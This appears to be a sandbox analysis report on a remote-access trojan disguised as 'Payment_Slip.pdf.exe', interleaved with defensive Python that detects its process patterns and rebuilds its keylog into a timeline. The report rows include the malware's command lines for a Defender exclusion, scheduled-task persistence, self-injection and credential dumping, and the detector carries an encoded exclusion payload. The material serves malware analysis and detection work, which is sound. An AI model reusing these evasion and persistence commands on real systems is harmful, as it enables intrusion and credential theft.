Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory written: C:\Users\user\Desktop\Payment_Slip.pdf.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Memory written: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: NULL target: C:\Users\user\Desktop\Payment_Slip.pdf.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: NULL target: C:\Windows\SysWOW64\schtasks.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section unmapped: C:\Windows\SysWOW64\schtasks.exe base address: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 11_2_00410B5C
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 17_2_00410B5C
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004175E1 mouse_event, 11_2_004175E1
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe "C:\Users\user\Desktop\Payment_Slip.pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\AppData\Roaming\host.exe "C:\Users\user\AppData\Roaming\host.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\AppData\Local\Temp\conserver.exe "C:\Users\user\AppData\Local\Temp\conserver.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\qticobshgwcqiiv" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\snnvpudbueuusojfxn" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\dpanqmncqmmhvvfjoxmrs" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe" Jump to behavior
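The process tree above carries the whole evasion and persistence chain in command lines alone: PowerShell adding a Defender path exclusion for the dropped copy, schtasks importing a task definition from a .tmp file in %TEMP%, a double-extension executable spawning copies of itself, and the /stext switch (the NirSoft password-recovery tools' save-as-text option, consistent with the browser and mail credential theft flagged in the signature list) writing to random-named files in %TEMP%. The Python below is an added example, not part of the sandbox report and not the malware's code; it runs those four checks over constructed process-creation records modelled on the rows above, including the Base64 -EncodedCommand form that the "Powershell Base64 Encoded MpPreference Cmdlet" Sigma hit refers to. The record fields, the rule names and the two benign records are assumptions for illustration.

```python
import base64
import re
from dataclasses import dataclass
from typing import List


@dataclass
class ProcEvent:
    """One process-creation record (the fields a Sysmon Event ID 1 or 4688 row carries)."""
    parent: str
    image: str
    cmdline: str


@dataclass
class Finding:
    rule: str
    image: str
    detail: str


SAMPLE = r"C:\Users\user\Desktop\Payment_Slip.pdf.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"

# Constructed: the same exclusion as an -EncodedCommand payload (PowerShell expects
# Base64 over UTF-16LE), the form the "Base64 Encoded MpPreference Cmdlet" Sigma rule targets.
ENCODED_EXCLUSION = base64.b64encode(
    r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming"'.encode("utf-16le")
).decode("ascii")

# Constructed records modelled on the "Process created" rows above, plus two benign ones.
EVENTS = [
    ProcEvent(SAMPLE, PS, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                          r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"'),
    ProcEvent(SAMPLE, PS, f"powershell.exe -NoProfile -EncodedCommand {ENCODED_EXCLUSION}"),
    ProcEvent(SAMPLE, SCHTASKS, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" '
                                r'/XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp"'),
    ProcEvent(SAMPLE, SAMPLE, rf'"{SAMPLE}"'),
    ProcEvent(SAMPLE, SAMPLE, rf'{SAMPLE} /stext "C:\Users\user\AppData\Local\Temp\qticobshgwcqiiv"'),
    ProcEvent(SAMPLE, r"C:\Users\user\AppData\Roaming\host.exe", r'"C:\Users\user\AppData\Roaming\host.exe"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              r'"C:\Windows\System32\notepad.exe" C:\Users\user\Documents\notes.txt'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", SCHTASKS,
              r'schtasks.exe /Create /TN "Backup\Nightly" /XML "C:\ProgramData\Backup\nightly.xml"'),
]

# -e, -ec, -enc and the full switch are the common spellings of -EncodedCommand.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)", re.I)
EXCLUSION_RE = re.compile(r"add-mppreference\b.*-exclusion(?:path|process|extension)", re.I)
DOUBLE_EXT_RE = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?|jpe?g|png|txt|zip)\.(?:exe|scr|com|pif)$", re.I)
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def expand_powershell(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload (if any) so the rules see the plaintext too."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} {decoded}"


def scan(events: List[ProcEvent]) -> List[Finding]:
    findings: List[Finding] = []
    for ev in events:
        image = ev.image.lower()
        cmd = expand_powershell(ev.cmdline)
        cmd_l = cmd.lower()
        # 1. Defender exclusion added from the command line (plain or Base64-encoded).
        if image.endswith("powershell.exe") and EXCLUSION_RE.search(cmd):
            findings.append(Finding("defender_exclusion", ev.image, cmd))
        # 2. Task imported from an XML file living in a temp directory.
        if (image.endswith("schtasks.exe") and "/create" in cmd_l and "/xml" in cmd_l
                and any(d in cmd_l for d in TEMP_DIRS)):
            findings.append(Finding("temp_task_xml", ev.image, cmd))
        # 3. Document-looking name with an executable extension behind it.
        if DOUBLE_EXT_RE.search(image):
            findings.append(Finding("double_extension", ev.image, cmd))
        # 4. Self-spawn with /stext: credentials dumped to a text file by an embedded recovery tool.
        if "/stext" in cmd_l and image == ev.parent.lower():
            findings.append(Finding("nirsoft_stext", ev.image, cmd))
    return findings


if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f"{f.rule:<20} {f.image}\n    {f.detail}")
```

On a real host the records would come from Sysmon Event ID 1 or Security 4688 with command-line auditing enabled; the ProgramData task import and the notepad launch are there to show that the temp-directory and self-spawn conditions are what keep the rules quiet on ordinary administration.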
Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerFD\
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>rTH
Source: mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>{Win}r@\
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br><b>[ ]</b> (16/03/2025 17:48:16)<br>rTH
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>rTH
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br>t-
Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}rTH
Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br><b>[ ]</b> (16/03/2025 17:48:16)<br>r<br><b>[ Microsoft
Source: host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}TH
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>r
Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>@\
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002751000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031FC000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033AB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managert-
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>TH
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>LR
Source: mykksg.exe, 00000019.00000002.3621446588.0000000002689000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>@\
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br>
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br>
Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>{Win}rTH
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>rTH
Source: mykksg.exe, 00000019.00000002.3621446588.0000000002689000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>{Win}TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR
Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013C6000.00000004.00000020.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>@\
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:54:37)</font></font><br>LR
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br><b>[ ]</b> (16/03/2025 17:48:16)<br>r<br>t-
Source: host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<LR
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>rTH
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}rTH
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>r<br><font color="#00b1ba"><b>[ Microsoft
Source: host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>{Win}r
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>TH
Source: mykksg.exe, 00000019.00000002.3621446588.0000000002689000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>{Win}rTH
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>rTH
Source: Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, logs.dat.5.dr Binary or memory string: [Program Manager]
Source: mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>{Win}r
Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQz(
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:54:37)</font></font><br>rTH
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br>
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br><b>[ ]</b> (16/03/2025 17:48:16)<br>LR
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br>t-
Source: host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>{Win}r@\
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br>t-
Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>TH
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>r<br>t-
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@
Source: Payment_Slip.pdf.exe, 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@\
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>{Win}TH
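The "Program Manager ... {Win}" strings recovered from host.exe, conserver.exe, Windows Update.exe and mykksg.exe are fragments of the RAT's keystroke log (the same bracketed window title appears in the dropped logs.dat listed above): each entry is a window title in brackets, a timestamp, and the keys typed in that window with special keys in braces, and two date orders occur, month-first in the HTML-styled entries and day-first in the plain ones. The Python below is an added example, not the report's or the malware's own code; it rebuilds those entries into a timeline from constructed input copied from the rows above. The entry layout is inferred from the fragments, and treating the "Operating System:" text in front of the first title as a leftover of the log header rather than part of the window title is an assumption.

```python
import re
from datetime import datetime
from typing import Dict, List, Optional

# Constructed input: two of the memory-string hits listed above, copied as they appear,
# including the junk bytes ("TH") that follow the real log text in memory.
FRAGMENTS = [
    'Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br>'
    '<font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br>'
    '<font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>rTH',
    'Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br>'
    '<b>[ ]</b> (16/03/2025 17:48:16)<br>rTH',
]

MDY, DMY = "%m/%d/%Y %H:%M:%S", "%d/%m/%Y %H:%M:%S"
BR_RE = re.compile(r"<br\s*/?>", re.I)
TAG_RE = re.compile(r"<[^>]+>")
# One entry header: optional "[", window title, "]", then "(date time)". Titles may contain
# "(", so the timestamp shape is what anchors the match, not the parenthesis.
HEADER_RE = re.compile(
    r"\[?\s*(?P<title>[^\[\]\n]*?)\s*\]?\s*\((?P<ts>\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\)"
)
SPECIAL_RE = re.compile(r"\{([^{}]+)\}")
# Assumption: the "Operating System:" text before the first title is carried over from the
# log header that precedes the entries in memory, so it is not part of the window title.
HEADER_PREFIX = "Operating System:"


def parse_timestamp(ts: str, day_first: Optional[bool] = None) -> datetime:
    """Both date orders occur in the fragments above. With day_first=None, month-first is
    tried and day-first used only when that fails, which leaves days <= 12 ambiguous; pass
    day_first explicitly when the producing binary's format is known."""
    if day_first is None:
        fmts = (MDY, DMY)
    else:
        fmts = (DMY,) if day_first else (MDY,)
    for fmt in fmts:
        try:
            return datetime.strptime(ts, fmt)
        except ValueError:
            continue
    raise ValueError(f"unparseable timestamp: {ts!r}")


def parse_keylog(fragment: str, day_first: Optional[bool] = None) -> List[Dict]:
    """Split one fragment into entries of (window, timestamp, keys, special_keys)."""
    text = TAG_RE.sub("", BR_RE.sub("\n", fragment))
    heads = list(HEADER_RE.finditer(text))
    entries: List[Dict] = []
    for i, m in enumerate(heads):
        end = heads[i + 1].start() if i + 1 < len(heads) else len(text)
        title = m.group("title").strip()
        if title.startswith(HEADER_PREFIX):
            title = title[len(HEADER_PREFIX):].strip()
        keys = text[m.end():end].strip()  # keystrokes up to the next header; trailing junk stays
        entries.append({
            "window": title,
            "timestamp": parse_timestamp(m.group("ts"), day_first),
            "keys": keys,
            "special_keys": SPECIAL_RE.findall(keys),
        })
    return entries


def to_timeline(entries: List[Dict]) -> List[str]:
    """Chronological one-line-per-entry view for a report or for diffing two dumps."""
    return [
        f'{e["timestamp"]:%Y-%m-%d %H:%M:%S}  [{e["window"]}]  {e["keys"]}'
        for e in sorted(entries, key=lambda e: e["timestamp"])
    ]


if __name__ == "__main__":
    merged = parse_keylog(FRAGMENTS[0]) + parse_keylog(FRAGMENTS[1], day_first=True)
    for line in to_timeline(merged):
        print(line)
```

Run against strings pulled from a full process dump (or from logs.dat itself) rather than the truncated rows in the report, the trailing junk disappears and the keys field is the actual typed text; the empty "[ ]" window entries are keystrokes logged while no window title could be read.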
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004329DA cpuid 11_2_004329DA
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: EnumSystemLocalesW, 11_2_0044F17B
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: EnumSystemLocalesW, 11_2_0044F130
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: EnumSystemLocalesW, 11_2_0044F216
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 11_2_0044F2A3
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: GetLocaleInfoA, 11_2_0040E2BB
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: GetLocaleInfoW, 11_2_0044F4F3
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 11_2_0044F61C
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: GetLocaleInfoW, 11_2_0044F723
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 11_2_0044F7F0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: EnumSystemLocalesW, 11_2_00445914
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: GetLocaleInfoW, 11_2_00445E1C
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 11_2_0044EEB8
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: EnumSystemLocalesW, 17_2_0044F17B
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: EnumSystemLocalesW, 17_2_0044F130
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: EnumSystemLocalesW, 17_2_0044F216
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 17_2_0044F2A3
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: GetLocaleInfoA, 17_2_0040E2BB
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: GetLocaleInfoW, 17_2_0044F4F3
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 17_2_0044F61C
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: GetLocaleInfoW, 17_2_0044F723
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 17_2_0044F7F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: EnumSystemLocalesW, 17_2_00445914
